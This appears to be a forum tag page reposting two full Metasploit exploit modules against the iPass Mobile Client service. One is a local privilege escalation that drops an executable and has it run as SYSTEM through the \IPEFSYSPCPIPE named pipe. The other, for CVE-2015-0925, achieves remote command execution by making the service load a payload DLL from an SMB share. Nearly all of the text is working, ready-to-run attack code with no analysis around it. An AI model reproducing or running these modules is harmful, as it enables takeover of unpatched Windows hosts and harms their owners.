Search the Community
Showing results for tags 'pipe'.
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Post::File include Msf::Exploit::FileDropper include Msf::Post::Windows::Priv include Msf::Post::Windows::Services def initialize(info={}) super(update_info(info, { 'Name' => 'iPass Mobile Client Service Privilege Escalation', 'Description' => %q{ The named pipe, \IPEFSYSPCPIPE, can be accessed by normal users to interact with the iPass service. The service provides a LaunchAppSysMode command which allows to execute arbitrary commands as SYSTEM. }, 'License' => MSF_LICENSE, 'Author' => [ 'h0ng10' # Vulnerability discovery, metasploit module ], 'Arch' => ARCH_X86, 'Platform' => 'win', 'SessionTypes' => ['meterpreter'], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Windows', { } ] ], 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'References' => [ ['URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-03.txt'] ], 'DisclosureDate' => 'Mar 12 2015', 'DefaultTarget' => 0 })) register_options([ OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)']) ], self.class) end def check os = sysinfo['OS'] unless os =~ /windows/i return Exploit::CheckCode::Safe end svc = service_info('iPlatformService') if svc && svc[:display] =~ /iPlatformService/ vprint_good("Found service '#{svc[:display]}'") if is_running? vprint_good('Service is running') else vprint_error('Service is not running!') end vprint_good('Opening named pipe...') handle = open_named_pipe('\\\\.\\pipe\\IPEFSYSPCPIPE') if handle.nil? vprint_error('\\\\.\\pipe\\IPEFSYSPCPIPE named pipe not found') return Exploit::CheckCode::Safe else vprint_good('\\\\.\\pipe\\IPEFSYSPCPIPE found!') session.railgun.kernel32.CloseHandle(handle) end return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end def open_named_pipe(pipe) invalid_handle_value = 0xFFFFFFFF r = session.railgun.kernel32.CreateFileA(pipe, 'GENERIC_READ | GENERIC_WRITE', 0x3, nil, 'OPEN_EXISTING', 'FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL', 0) handle = r['return'] return nil if handle == invalid_handle_value handle end def write_named_pipe(handle, command) buffer = Rex::Text.to_unicode(command) w = client.railgun.kernel32.WriteFile(handle, buffer, buffer.length, 4, nil) if w['return'] == false print_error('The was an error writing to pipe, check permissions') return false end true end def is_running? begin status = service_status('iPlatformService') rescue RuntimeError => e print_error('Unable to retrieve service status') return false end return status && status[:state] == 4 end def exploit if is_system? fail_with(Failure::NoTarget, 'Session is already elevated') end handle = open_named_pipe("\\\\.\\pipe\\IPEFSYSPCPIPE") if handle.nil? fail_with(Failure::NoTarget, "\\\\.\\pipe\\IPEFSYSPCPIPE named pipe not found") else print_status("Opended \\\\.\\pipe\\IPEFSYSPCPIPE! Proceeding...") end if datastore['WritableDir'] and not datastore['WritableDir'].empty? temp_dir = datastore['WritableDir'] else temp_dir = client.sys.config.getenv('TEMP') end print_status("Using #{temp_dir} to drop malicious exe") begin cd(temp_dir) rescue Rex::Post::Meterpreter::RequestError session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Config, "Failed to use the #{temp_dir} directory") end print_status('Writing malicious exe to remote filesystem') write_path = pwd exe_name = "#{rand_text_alpha(10 + rand(10))}.exe" begin write_file(exe_name, generate_payload_exe) register_file_for_cleanup("#{write_path}\\#{exe_name}") rescue Rex::Post::Meterpreter::RequestError session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Unknown, "Failed to drop payload into #{temp_dir}") end print_status('Sending LauchAppSysMode command') begin write_res = write_named_pipe(handle, "iPass.EventsAction.LaunchAppSysMode #{write_path}\\#{exe_name};;;") rescue Rex::Post::Meterpreter::RequestError session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Unknown, 'Failed to write to pipe') end unless write_res fail_with(Failure::Unknown, 'Failed to write to pipe') end end end Source
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Client::Authenticated include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'IPass Control Pipe Remote Command Execution', 'Description' => %q{ This module exploits a vulnerability in the IPass Client service. This service provides a named pipe which can be accessed by the user group BUILTIN\Users. This pipe can be abused to force the service to load a DLL from a SMB share. }, 'Author' => [ 'Matthias Kaiser', # Vulnerability discovery 'h0ng10 <info[at]mogwaisecurity.de>', # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2015-0925' ], [ 'OSVDB', '117423' ], [ 'BID', '72265' ], [ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'Platform' => 'win', 'Targets' => [ [ 'Windows x32', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] ], 'Privileged' => true, 'DisclosureDate' => 'Jan 21 2015', 'DefaultTarget' => 0)) register_options( [ OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15]) ], self.class) deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME') end def check echo_value = rand_text_alphanumeric(rand(10) + 10) begin response = send_command("System.Echo #{echo_value}") if response =~ Regexp.new(echo_value) return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Unknown end rescue Rex::ConnectionError => e vprint_error("Connection failed: #{e.class}: #{e}") return Msf::Exploit::CheckCode::Unknown rescue Rex::Proto::SMB::Exceptions::LoginError => e vprint_error('Connection reset during login') return Msf::Exploit::CheckCode::Unknown end end def setup super self.file_name = "#{Rex::Text.rand_text_alpha(7)}.dll" self.share = Rex::Text.rand_text_alpha(5) end def primer self.file_contents = generate_payload_dll print_status("File available on #{unc}...") send_command("iPass.SWUpdateAssist.RegisterCOM #{unc}") end def send_command(command) # The connection is closed after each command, so we have to reopen it connect smb_login pipe = simple.create_pipe('\\IPEFSYSPCPIPE') pipe.write(Rex::Text.to_unicode(command)) response = Rex::Text.to_ascii(pipe.read) response end def exploit begin Timeout.timeout(datastore['SMB_DELAY']) { super } rescue Timeout::Error # do nothing... just finish exploit and stop smb server... end end end Source